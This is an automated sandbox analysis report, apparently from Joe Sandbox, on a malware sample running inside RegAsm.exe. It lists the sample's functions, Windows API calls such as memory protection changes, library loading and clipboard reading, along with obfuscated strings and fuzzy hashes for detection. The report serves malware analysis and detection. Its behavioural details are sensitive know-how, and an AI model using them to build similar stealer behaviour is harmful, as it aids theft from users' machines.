Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00C112F0

Memory Dump Source

Source File: 00000000.00000002.2066333122.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_A6QFRW2WiY.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 593c52e17bcb583d90ffa0fa51f7c125f4977fe84538b50f5411850bb6e55da3
Instruction ID: 42e4ebc8477c539dd9b080eec922dbc3edda07249e9624a9f70367e35969396b
Opcode Fuzzy Hash: 593c52e17bcb583d90ffa0fa51f7c125f4977fe84538b50f5411850bb6e55da3
Instruction Fuzzy Hash: BA21F7B1D002499FCB10DF9AD880ADEFBF5FF49310F508419E919A7250C779A944CFA1

Analysis Process: RegAsm.exePID: 6404, Parent PID: 6380COMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	18.2%
Total number of Nodes:	66
Total number of Limit Nodes:	6

Executed Functions

Function 0040F870 Relevance: 31.4, Strings: 24, Instructions: 1361COMMON

Download Yara Rule

Strings

m%o, xrefs: 00410083
KM, xrefs: 004103B2
A{y, xrefs: 00410BF6, 00410BD3, 00410D56, 00410D33, 00410BDB, 00410D3B
e1E3, xrefs: 0040F973
\S, xrefs: 00410D0C
Zm^o, xrefs: 0040F9CE
SiJk, xrefs: 0040F9D5
vK, xrefs: 004101A0
F=W?, xrefs: 0040F97A
|MnO, xrefs: 0040F996
_O, xrefs: 00410196
A{y, xrefs: 00410C88, 00410C80, 00410C6F, 00410C8C
8eFg, xrefs: 0040F9C0
#]-_, xrefs: 0040F9B2
QaRc, xrefs: 0040F9C7
sq, xrefs: 00410CCC
*e*g, xrefs: 00410091
}AtC, xrefs: 0040F98F
L9N;, xrefs: 0040F981
A{y, xrefs: 00410E00
IC, xrefs: 004103A4
q<s, xrefs: 0041007C
$#, xrefs: 00410A9C
%EqG, xrefs: 0040F988

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: m%o$#]-_$$#$%EqG$*e*g$8eFg$A{y$A{y$A{y$F=W?$IC$KM$L9N;$QaRc$SiJk$Zm^o$\S$_O$e1E3$vK$|MnO$}AtC$q<s$sq
API String ID: 0-4009828573
Opcode ID: e9301bd511ebedeaef9cb13992801f6fad206433e617dca8a950e8435565525c
Instruction ID: c3630ad4f5c475876f494961501e8d9213224f6ba4832620ddef517b73d89da9
Opcode Fuzzy Hash: e9301bd511ebedeaef9cb13992801f6fad206433e617dca8a950e8435565525c
Instruction Fuzzy Hash: 47B297B4504701DFD7208F66D881BABBBF5FF4A301F00892DE4969B6A1D778E844CB59

Function 0040E9C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(9FF799E3,00000000,8!67), ref: 0040EACD

Strings

8!67, xrefs: 0040EA33, 0040EA3B

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID: 8!67
API String ID: 1029625771-485824511
Opcode ID: e91380da90d0a1ae8e1856b7847d0d07c78a085f8e8e0f59ae24f324f6a7921f
Instruction ID: a378cef6331095809e7f5604f7941113c356dc053d7457f57d7eb746df845c38
Opcode Fuzzy Hash: e91380da90d0a1ae8e1856b7847d0d07c78a085f8e8e0f59ae24f324f6a7921f
Instruction Fuzzy Hash: A15161B4D00308BFDB01EFA5EC429ADBF71EB05386F50043AF804B7266D7399A558B99

Function 00445D10 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00412BE5,00000000,00000001), ref: 00445D3E

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 0040CE80 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 165
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetInputState.USER32 ref: 0040CE91
GetCurrentThreadId.KERNEL32 ref: 0040CEA6
GetCurrentProcessId.KERNEL32 ref: 0040CEAC
ExitProcess.KERNEL32 ref: 0040D080

Strings

98?>, xrefs: 0040D043, 0040D04B
=<#", xrefs: 0040D00E

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: CurrentProcess$ExitInputStateThread
String ID: 98?>$=<#"
API String ID: 1029096631-575674944
Opcode ID: a3f6515795037531821660836c7337696ca12dfe54cee5e42f96d046294826c0
Instruction ID: 1cabd40eefa5255427a832a9ef4cda33b9a15c7814e292e2633299dd4afe059a
Opcode Fuzzy Hash: a3f6515795037531821660836c7337696ca12dfe54cee5e42f96d046294826c0
Instruction Fuzzy Hash: E2514D7480C2809BD301BFA5D544A1EFBE5AF56708F148D2DE5C8AB392C73AC814CB6B

Function 00442CE0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00442D33

Strings

B-D, xrefs: 00442D39

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID: B-D
API String ID: 1279760036-3720634330
Opcode ID: 79013324be2e7cf687789249e67f7897953a24040b7a6cae2efb9464a0356ea0
Instruction ID: 7180bec0afc63eb0645584d58a18209a7e12a10d463dd5cc8d56965c9cb88df8
Opcode Fuzzy Hash: 79013324be2e7cf687789249e67f7897953a24040b7a6cae2efb9464a0356ea0
Instruction Fuzzy Hash: D3F0177450D3409BE302EF18DA94A1EFBE5EF5A706F84486DF4C597262C375E810CBA6

Function 00444CCE Relevance: 1.6, APIs: 1, Instructions: 71
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 00444D4C

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 57921ecff0074fb26a671621a8c6e10d671e06d4fff2e775d20f371b54bcd6f6
Instruction ID: 75211bfb381c99097afae6bc3bfff694755b045083e4f895af76f65e9cef83b2
Opcode Fuzzy Hash: 57921ecff0074fb26a671621a8c6e10d671e06d4fff2e775d20f371b54bcd6f6
Instruction Fuzzy Hash: E321C1B5A003469FD701CFA9E59176EBBB1BF4A306F644429E141E7342C378EA11CFA9

Function 004457B5 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000), ref: 00445830

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0d78dcad7f45249fd3ebfe48136f0c9b948a5e3c4ef95149ab5574fde2cd596d
Instruction ID: a9554c6d5d808d0ab35009c0ac388e684a1f1b7fd223a74b0eaae5b27db1e036
Opcode Fuzzy Hash: 0d78dcad7f45249fd3ebfe48136f0c9b948a5e3c4ef95149ab5574fde2cd596d
Instruction Fuzzy Hash: C1019271900665DBEF119F54EC91A6EBB70FF46702F4008A6F411EA252DB38C521CA69

Function 00442D62 Relevance: 1.5, APIs: 1, Instructions: 44
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 00442DE2

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: cd95ca436aed157d869a077e2eb902530f9a790a96de65f025573e8c48497f7e
Instruction ID: 882d167d70f18cf93cb8acc8d19bcbadd3068f1821c83cad1d58421c6399e89d
Opcode Fuzzy Hash: cd95ca436aed157d869a077e2eb902530f9a790a96de65f025573e8c48497f7e
Instruction Fuzzy Hash: 47014B34608340DFD311AF18FA55A09BBF1EB06B06F044C6AE5C087362C375EC61CB56

Non-executed Functions

Function 00411DAE Relevance: 38.0, APIs: 4, Strings: 17, Instructions: 1276COMMON

Download Yara Rule

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411DC0
CoUninitialize.OLE32 ref: 004120A9
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004120C1

Strings

\^, xrefs: 0041260B
?&%, xrefs: 0041249C
:+*), xrefs: 0041267B
'[(Y, xrefs: 00411FB9
b,A, xrefs: 00412C50
[n, xrefs: 00412619
U, xrefs: 00412995
%W'U, xrefs: 00411FC0
h], xrefs: 0041299C
6K;I, xrefs: 00411F9D
W?O=, xrefs: 00411F7A
1<$, xrefs: 0041248E
/^, xrefs: 00412604
_[, xrefs: 00412612
l/=-, xrefs: 00412674
4`[b, xrefs: 00412BBE
(S)Q, xrefs: 00411FC7

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: DirectoryInitializeSecuritySystemUninitialize
String ID: %W'U$'[(Y$(S)Q$/^$1<$$4`[b$6K;I$:+*)$?&%$U$W?O=$[n$\^$_[$b,A$h]$l/=-
API String ID: 1555113959-2802985764
Opcode ID: 7c1b73b5960e5cb8280c42fcae52b11ff627b864f58c0a8a99d72a8fdf34b107
Instruction ID: 0890cdf46cb5fd93ec4d35b377929ccd45ac2a1524a64ef46bb0b35c9f4aa94a
Opcode Fuzzy Hash: 7c1b73b5960e5cb8280c42fcae52b11ff627b864f58c0a8a99d72a8fdf34b107
Instruction Fuzzy Hash: E39202B4500341DFD3259F25D890A26BBF1FF16308F2448AEE4C58B352D73AE896CB99

Function 00428581 Relevance: 24.8, Strings: 19, Instructions: 1017COMMON

Download Yara Rule

Strings

{8}, xrefs: 00428C56
&+, xrefs: 00428EF1
aQaS, xrefs: 004290D5
eUgW, xrefs: 004290E0
HyK{, xrefs: 00429117
8K>M, xrefs: 00428C82
Y], xrefs: 004288AF
ZJ, xrefs: 004288BA
/$, xrefs: 00428EE6
^], xrefs: 004288A4
4`[b, xrefs: 004292E0
\_, xrefs: 00428CB9
>O, xrefs: 00428899
sAuC, xrefs: 004290A9
l]j_, xrefs: 004290CA
4`[b, xrefs: 00429900
DE, xrefs: 00428A72
31, xrefs: 00428E6D
*, xrefs: 00428EFC

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: {8}$&+$*$/$$4`[b$4`[b$8K>M$>O$DE$HyK{$Y]$ZJ$\_$^]$aQaS$eUgW$l]j_$sAuC$31
API String ID: 0-3538536219
Opcode ID: 7d74811fdd82feb000a695860ad95e8afdd67b0b2aa2c74e0eeb3869b4099422
Instruction ID: 0d01d294f5ac42c96272f57cdbc475340f3e3263fcb93a7f791e66e9023d972f
Opcode Fuzzy Hash: 7d74811fdd82feb000a695860ad95e8afdd67b0b2aa2c74e0eeb3869b4099422
Instruction Fuzzy Hash: 8BA24DB420D381CBE330CF25E540B9FBBE1BB85740FA48A2DE5C99B251DB749845CB96

Function 0041DACA Relevance: 21.1, Strings: 16, Instructions: 1128COMMON

Download Yara Rule

Strings

wvut, xrefs: 0041E2D7
SRQP, xrefs: 0041E31D
lmno, xrefs: 0041E4E3
`abc, xrefs: 0041E24B
xyz{, xrefs: 0041E25F
lmno, xrefs: 0041E22D
hijk, xrefs: 0041E237
HIJK, xrefs: 0041E287
pqrs, xrefs: 0041E4C5
defg, xrefs: 0041E241
pqrs, xrefs: 0041E273
PQRS, xrefs: 0041E2C3
VVZ`, xrefs: 0041E3AD
,-./, xrefs: 0041E443
gfed, xrefs: 0041E2FF
tuvw, xrefs: 0041E269

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ,-./$HIJK$PQRS$SRQP$VVZ`$`abc$defg$gfed$hijk$lmno$lmno$pqrs$pqrs$tuvw$wvut$xyz{
API String ID: 0-4259844150
Opcode ID: c05e8b2be86feaa69429dac1278eb537672adc3d07eb203c5182dab377d29760
Instruction ID: 6edab3831a676c65b5346b0794d5fdc330fee682ac90cd436dd138136671f69a
Opcode Fuzzy Hash: c05e8b2be86feaa69429dac1278eb537672adc3d07eb203c5182dab377d29760
Instruction Fuzzy Hash: A4A29AB4600B009FE720DF26C880BE7B7E2AF45705F54481EE9EA5B291DB39B485CF95

Function 00437DE0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 100clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00437DF0
GetWindowLongW.USER32 ref: 00437E15
GetClipboardData.USER32 ref: 00437E25
GlobalLock.KERNEL32 ref: 00437E44
GlobalUnlock.KERNEL32 ref: 00437F2E
CloseClipboard.USER32 ref: 00437F37

Strings

c, xrefs: 00437EA1
], xrefs: 00437EB5

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: ]$c
API String ID: 2832541153-3195450805
Opcode ID: 9d173db8625c292533a937b4ec308a27eb574b8c761597c8c21d12411735b29e
Instruction ID: f0355f79441650a0a2dfb925bc8775701aa76b8efccf3e07be0eb36c6224b3dc
Opcode Fuzzy Hash: 9d173db8625c292533a937b4ec308a27eb574b8c761597c8c21d12411735b29e
Instruction Fuzzy Hash: E841517550C7828ED311AF7C948531FBFE0AB96324F054A6DF4E986391D3388549CB97

Function 00431167 Relevance: 12.9, APIs: 4, Strings: 2, Instructions: 2395COMMON

Download Yara Rule

Strings

CT"P, xrefs: 004329B6
DEyv, xrefs: 00433101

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: CT"P$DEyv
API String ID: 0-2502682913
Opcode ID: a84dfd4050566295682649421f5760faad03067ec6b6a74ad0de1e7a051faa91
Instruction ID: 431c38d9bd3a7c6735da3ca242bad5345252c3ad66ca012962b032f7bb9076c0
Opcode Fuzzy Hash: a84dfd4050566295682649421f5760faad03067ec6b6a74ad0de1e7a051faa91
Instruction Fuzzy Hash: 28F2C0701047818FD7268F29C490B23FBE1EF1A315F18999ED4D68B792C77AE806CB65

Function 00401000 Relevance: 11.8, Strings: 8, Instructions: 1829COMMON

Download Yara Rule

Strings

@, xrefs: 00401840
gfff, xrefs: 00401E04
-, xrefs: 00401DCA
A, xrefs: 00401D91
0123456789abcdefxp, xrefs: 004014F7, 00401588
0123456789ABCDEFXP, xrefs: 004014EE, 0040157C
gfff, xrefs: 00401E6F
gfff, xrefs: 00401EB6

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$A$gfff$gfff$gfff
API String ID: 0-2771814109
Opcode ID: eee830bfda2d233a771dfd975141f7faa978a997b8c1b87711aac413b99c35f2
Instruction ID: 2498480ba6b5b8415727a7113cc8d1f2ebd9933ee789cd054bb499fd7dcc1bdb
Opcode Fuzzy Hash: eee830bfda2d233a771dfd975141f7faa978a997b8c1b87711aac413b99c35f2
Instruction Fuzzy Hash: B2D2E5716083418FD718CE29C49426BBBE2AFD9314F188A3EE4D99B3D1D778D906CB46

Function 00410690 Relevance: 10.5, Strings: 8, Instructions: 532COMMON

Download Yara Rule

Strings

sq, xrefs: 00410CCC
A{y, xrefs: 00410BF6, 00410BD3, 00410D56, 00410D33, 00410BDB, 00410D3B
\S, xrefs: 00410D0C
A{y, xrefs: 00410E00
$#, xrefs: 00410A9C
R(, xrefs: 00410720
AQ, xrefs: 00410718
A{y, xrefs: 00410C88, 00410C80, 00410C6F, 00410C8C

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: $#$A{y$A{y$A{y$AQ$R($\S$sq
API String ID: 0-1253197155
Opcode ID: 67392aa17aaf496b27799292926d0416478cfe0d9b3776bbfd582c162b3ffb75
Instruction ID: c8744994b336ed8796d2169cd055dc0108fc6d35be67ae44addff89cb22ae4a1
Opcode Fuzzy Hash: 67392aa17aaf496b27799292926d0416478cfe0d9b3776bbfd582c162b3ffb75
Instruction Fuzzy Hash: E31252B4109380ABD3209F55DA91B6FBBF4EF86B45F50882DF5C88B251D378D880DB5A

Function 0042CD08 Relevance: 10.5, Strings: 8, Instructions: 496COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0042D270
4`[b, xrefs: 0042D300
Y,u[, xrefs: 0042D371
]ZS/, xrefs: 0042D359
?s27, xrefs: 0042D381
Y", , xrefs: 0042D3E3, 0042D3E7
oB&V, xrefs: 0042D369
72O1, xrefs: 0042D379

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b$4`[b$72O1$?s27$Y", $Y,u[$]ZS/$oB&V
API String ID: 0-3181983892
Opcode ID: e5bfc5bf56ef9b586850b4494d77117ff740f303db6c4fe627894b075349ad6b
Instruction ID: c7714173f636146e9479f45cdbfd64f95855b45b88a278645e3d584f28d03ab1
Opcode Fuzzy Hash: e5bfc5bf56ef9b586850b4494d77117ff740f303db6c4fe627894b075349ad6b
Instruction Fuzzy Hash: 8AF10631A08351CFD3109F28E89072EB7E1AF8A315F58497DE895972A2D335DD44CB5A

Function 0042ABF9 Relevance: 10.4, Strings: 8, Instructions: 429COMMON

Download Yara Rule

Strings

@[, xrefs: 0042AC95
MNO, xrefs: 0042AF20
Rz, xrefs: 0042AC8A
@{, xrefs: 0042ACAB
4`[b, xrefs: 0042B030
4`[b, xrefs: 0042B170
KJML, xrefs: 0042B134
w|, xrefs: 0042ACA0

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b$4`[b$@[$@{$KJML$Rz$w|$MNO
API String ID: 0-1623158609
Opcode ID: 8c02f808a83e4429a6c8a7438855e9abc67fdd9eca1d84d18a5804688f6ec70e
Instruction ID: 0d5274147a009100e9f69bee6203c0e5e4e30e46d04de95bf5e006a81ed4453c
Opcode Fuzzy Hash: 8c02f808a83e4429a6c8a7438855e9abc67fdd9eca1d84d18a5804688f6ec70e
Instruction Fuzzy Hash: 2CE198B56083818BE320DF14E880B6FBBF1FB85305F44492DF695972A2D735D844CB9A

Function 004278E0 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 621COMMON

Download Yara Rule

Strings

tu, xrefs: 004279EA
bq, xrefs: 00427F0B
\A, xrefs: 00427FEE
(M, xrefs: 00427FE7

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: (M$\A$bq$tu
API String ID: 0-1669698739
Opcode ID: 80540fe6eb13f791428253bdae1ec886e8beca1e1d8ea505e4215bcf766940b1
Instruction ID: 7e5d4be01749d98fec94da65f0d144c1e3e64fb0894ea9a14a900d121e3c7a48
Opcode Fuzzy Hash: 80540fe6eb13f791428253bdae1ec886e8beca1e1d8ea505e4215bcf766940b1
Instruction Fuzzy Hash: DD3251B4509351ABD710DF55E980A2FBBF0BF86748F40491DF895AB352D338E904CBAA

Function 0040DBF0 Relevance: 9.1, Strings: 7, Instructions: 321COMMON

Download Yara Rule

Strings

9(0-, xrefs: 0040DDA3, 0040DDAB
!4-0, xrefs: 0040DD6C
Q]T_, xrefs: 0040DF8B
D, xrefs: 0040DE2F
TW, xrefs: 0040DFF7
1,'&, xrefs: 0040DD74
@A, xrefs: 0040DF96

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: !4-0$1,'&$9(0-$@A$D$Q]T_$TW
API String ID: 0-528657158
Opcode ID: f83999a9e731f8dbcb79dc171e3d13602147dc98599bd6f6efd75ab4d13cf1b9
Instruction ID: dd5b631da12e9e24317945e72edf82b14a2171761ed38a2be2e3316825c547a1
Opcode Fuzzy Hash: f83999a9e731f8dbcb79dc171e3d13602147dc98599bd6f6efd75ab4d13cf1b9
Instruction Fuzzy Hash: A4C124B05083809BD311EF59D880A2FBBE4EB96744F104D2EF5D49B292D379D918CB67

Function 004015DE Relevance: 7.9, Strings: 6, Instructions: 403COMMON

Download Yara Rule

Strings

gfff, xrefs: 00401FE5
gfff, xrefs: 00401FFA
gfff, xrefs: 0040204B
0123456789abcdefxp, xrefs: 004015E7
0123456789ABCDEFXP, xrefs: 004015DE
+, xrefs: 00401FA7

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: +$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff
API String ID: 0-925659942
Opcode ID: 230964537ae32bca0b931bad37bb8585c799be153586adb52acdb34528e34338
Instruction ID: 0bbd2fdc5c3003afc5383300cdbe59139718eb5fc6d9f0d72bd4289b05a9f032
Opcode Fuzzy Hash: 230964537ae32bca0b931bad37bb8585c799be153586adb52acdb34528e34338
Instruction Fuzzy Hash: 17E1E2307083828BD718CE29C59476FBBE2AFD5304F18893EE586973E1DB79D8458746

Function 004013BC Relevance: 7.9, Strings: 6, Instructions: 355COMMON

Download Yara Rule

Strings

gfff, xrefs: 00401FE5
-, xrefs: 00401FB0
gfff, xrefs: 00401FFA
gfff, xrefs: 0040204B
0123456789abcdefxp, xrefs: 004013C5
0123456789ABCDEFXP, xrefs: 004013BC

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff
API String ID: 0-854689426
Opcode ID: 7af6b2e3b8783617a8b018d959a36356fefbf13e282cd0d868156f431fa2743b
Instruction ID: a04efb390cbaf254fc0f390cee4a826e3a66b79c4635c3109147dfa87f5857e7
Opcode Fuzzy Hash: 7af6b2e3b8783617a8b018d959a36356fefbf13e282cd0d868156f431fa2743b
Instruction Fuzzy Hash: D4D1B3316083828FC319CE29C58466BFBE2AFD5308F188A3EE499973D2D779D945C746

Function 0042D46E Relevance: 7.6, Strings: 6, Instructions: 81COMMON

Download Yara Rule

Strings

Y,u[, xrefs: 0042D371
]ZS/, xrefs: 0042D359
?s27, xrefs: 0042D381
Y", , xrefs: 0042D3E3, 0042D3E7
oB&V, xrefs: 0042D369
72O1, xrefs: 0042D379

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 72O1$?s27$Y", $Y,u[$]ZS/$oB&V
API String ID: 0-4052876082
Opcode ID: d70bf1c1f63042cca91e0f0d96952224449d1d71b1906fdab94c8129b85aa0fc
Instruction ID: 255cf168559f10be7d1175cf8988301fb32433d8d6dbced94f32dc3915239b59
Opcode Fuzzy Hash: d70bf1c1f63042cca91e0f0d96952224449d1d71b1906fdab94c8129b85aa0fc
Instruction Fuzzy Hash: E1215C72908351DFC710DF59E480A2FFBE4AF95705F544A1EE8C5AB212C335E9418B9B

Function 00401379 Relevance: 7.2, Strings: 5, Instructions: 945COMMON

Download Yara Rule

Strings

0, xrefs: 00402573
@, xrefs: 0040292D
i, xrefs: 00402A4A
0, xrefs: 004022FF
0, xrefs: 00402238

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 0$0$0$@$i
API String ID: 0-3124195287
Opcode ID: 6efd4f3583b4206f53e5c158b0d5e9249ce92d80171d7db26026ad389132eb42
Instruction ID: 5f7c97cdea22e9e7ae5e923233e649b6b477c0ba0492bf097f20bb8c24429b32
Opcode Fuzzy Hash: 6efd4f3583b4206f53e5c158b0d5e9249ce92d80171d7db26026ad389132eb42
Instruction Fuzzy Hash: 2572F5716083428BD709CF28C69472BBBE2ABD5304F188A3EE499973D1D7B8DD45CB46

Function 00431AC3 Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 975COMMON

Download Yara Rule

Strings

{htM, xrefs: 00432097

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: {htM
API String ID: 0-2558583750
Opcode ID: 460e044c8e79f566fc65c807583dec1c3af10e9fc9010db1aa9919553b56872c
Instruction ID: 2e9d4f9b72aba7c047a4d8f56b5a49fef9b2a80b7b71dc117562085e0f476b46
Opcode Fuzzy Hash: 460e044c8e79f566fc65c807583dec1c3af10e9fc9010db1aa9919553b56872c
Instruction Fuzzy Hash: 9B628E701047818FD7258F29C550B23BBE1FF5A315F18998ED8DA8B792C379E806CB69

Function 00438247 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0043827D
GetSystemMetrics.USER32 ref: 0043828C

Strings

, xrefs: 00438337

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 685b0eab73d45fe6766972de414d355aecf0d4d749a3e166455b2a9a6706c085
Instruction ID: 2b3d388066a84b55b2792eb91a5522e2e062081d1c1fcb7522abf6f00e1b7a8b
